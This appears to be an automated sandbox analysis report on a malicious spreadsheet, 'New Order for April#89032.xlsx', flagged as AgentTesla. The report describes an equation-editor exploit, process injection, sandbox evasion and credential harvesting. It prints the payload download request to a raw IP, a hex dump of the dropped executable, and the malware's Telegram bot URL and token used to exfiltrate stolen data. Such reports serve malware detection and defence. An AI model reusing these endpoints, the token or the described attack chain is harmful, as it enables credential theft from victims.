Analysis Report New Order for April#89032.xlsx

Overview

General Information

Sample Name: New Order for April#89032.xlsx
Analysis ID: 383941
MD5: d7928e685d37d907d102cecdf3d3ce8b
SHA1: 3404ab865cdfb6c4a71151f5ae7bd17b92206885
SHA256: a2bfcc72f1a7a817323c32d758b45716541e4c3a7e33a7d3939638a6a2e8eaaa
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

AgentTesla Telegram RAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses the Telegram API (likely for C&C communication)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://198.23.174.104/hkn.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: 5.2.vbc.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1063661839", "Chat URL": "https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe ReversingLabs: Detection: 16%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: New Order for April#89032.xlsx ReversingLabs: Detection: 31%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

barindex
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 74MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00DA61B0
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00DA61A1
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00DA62D0
Source: C:\Users\Public\vbc.exe Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h 4_2_00DA62E0
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: api.telegram.org
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49168 -> 149.154.167.220:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.23.174.104:80

Networking:

barindex
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 10:50:31 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 08:14:53 GMTETag: "d7200-5bf71a458267a"Accept-Ranges: bytesContent-Length: 881152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d bb 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2a 0a 00 00 46 03 00 00 00 00 00 66 49 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 49 0a 00 4f 00 00 00 00 60 0a 00 2c 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 29 0a 00 00 20 00 00 00 2a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 42 03 00 00 60 0a 00 00 44 03 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0d 00 00 02 00 00 00 70 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 49 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 cc 48 00 00 03 00 00 00 01 00 00 06 4c 88 00 00 c8 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 198.23.174.104 198.23.174.104
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /hkn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.174.104Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BB8ECE.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /hkn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.174.104Connection: Keep-Alive
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: api.telegram.org
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp String found in binary or memory: http://WrqCET.com
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://api.telegram.org
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2380259910.00000000005B7000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdig2s1-1823.crl0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/02
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.godaddy.com/05
Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2167842702.00000000023A1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2380811356.00000000025A4000.00000004.00000001.sdmp String found in binary or memory: https://YiNu10TJVGgbJcx5.com
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org
Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380230451.0000000000583000.00000004.00000020.sdmp String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentdocument-----
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.orgP
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp String found in binary or memory: https://certs.godaddy.com/repository/0
Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
Source: vbc.exe, vbc.exe.2.dr String found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr String found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 4_2_00535404 NtQueryInformationProcess, 4_2_00535404
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053539F NtQueryInformationProcess, 4_2_0053539F
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DB2050 4_2_00DB2050
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053F050 4_2_0053F050
Source: C:\Users\Public\vbc.exe Code function: 4_2_00530288 4_2_00530288
Source: C:\Users\Public\vbc.exe Code function: 4_2_005362B0 4_2_005362B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00538378 4_2_00538378
Source: C:\Users\Public\vbc.exe Code function: 4_2_00532402 4_2_00532402
Source: C:\Users\Public\vbc.exe Code function: 4_2_005374D0 4_2_005374D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00535700 4_2_00535700
Source: C:\Users\Public\vbc.exe Code function: 4_2_005327D8 4_2_005327D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_005339C1 4_2_005339C1
Source: C:\Users\Public\vbc.exe Code function: 4_2_00536AE0 4_2_00536AE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00533DA0 4_2_00533DA0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053E190 4_2_0053E190
Source: C:\Users\Public\vbc.exe Code function: 4_2_00539278 4_2_00539278
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053926A 4_2_0053926A
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053539F 4_2_0053539F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053A450 4_2_0053A450
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053A460 4_2_0053A460
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053B5C0 4_2_0053B5C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053A670 4_2_0053A670
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053A680 4_2_0053A680
Source: C:\Users\Public\vbc.exe Code function: 4_2_005327C8 4_2_005327C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053E830 4_2_0053E830
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053A8C0 4_2_0053A8C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053A8B0 4_2_0053A8B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00539908 4_2_00539908
Source: C:\Users\Public\vbc.exe Code function: 4_2_0053AAB9 4_2_0053AAB9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00539E10 4_2_00539E10
Source: C:\Users\Public\vbc.exe Code function: 4_2_00539E00 4_2_00539E00
Source: C:\Users\Public\vbc.exe Code function: 4_2_00530E20 4_2_00530E20
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA0048 4_2_00DA0048
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA1960 4_2_00DA1960
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA4A80 4_2_00DA4A80
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA46BF 4_2_00DA46BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA2880 4_2_00DA2880
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA286F 4_2_00DA286F
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA4C64 4_2_00DA4C64
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA0012 4_2_00DA0012
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA1950 4_2_00DA1950
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA1E17 4_2_00DA1E17
Source: C:\Users\Public\vbc.exe Code function: 4_2_00DA1E28 4_2_00DA1E28
Source: C:\Users\Public\vbc.exe Code function: 5_2_00DB2050 5_2_00DB2050
Source: C:\Users\Public\vbc.exe Code function: 5_2_00456048 5_2_00456048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00455430 5_2_00455430
Source: C:\Users\Public\vbc.exe Code function: 5_2_00455778 5_2_00455778
Source: C:\Users\Public\vbc.exe Code function: 5_2_004599A8 5_2_004599A8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0045E9A8 5_2_0045E9A8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0045C1F8 5_2_0045C1F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00452198 5_2_00452198
Source: C:\Users\Public\vbc.exe Code function: 5_2_0045E3F8 5_2_0045E3F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0045D6F9 5_2_0045D6F9
Source: C:\Users\Public\vbc.exe Code function: 5_2_0045D758 5_2_0045D758
Source: C:\Users\Public\vbc.exe Code function: 5_2_00680108 5_2_00680108
Source: C:\Users\Public\vbc.exe Code function: 5_2_006831D0 5_2_006831D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00684260 5_2_00684260
Source: C:\Users\Public\vbc.exe Code function: 5_2_00687648 5_2_00687648
Source: C:\Users\Public\vbc.exe Code function: 5_2_0068CA28 5_2_0068CA28
Source: C:\Users\Public\vbc.exe Code function: 5_2_0068AAB0 5_2_0068AAB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00AC0048 5_2_00AC0048
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: New Order for April#89032.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
PE file contains strange resources
Source: hkn[1].exe.2.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hkn[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@1/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$New Order for April#89032.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR157.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
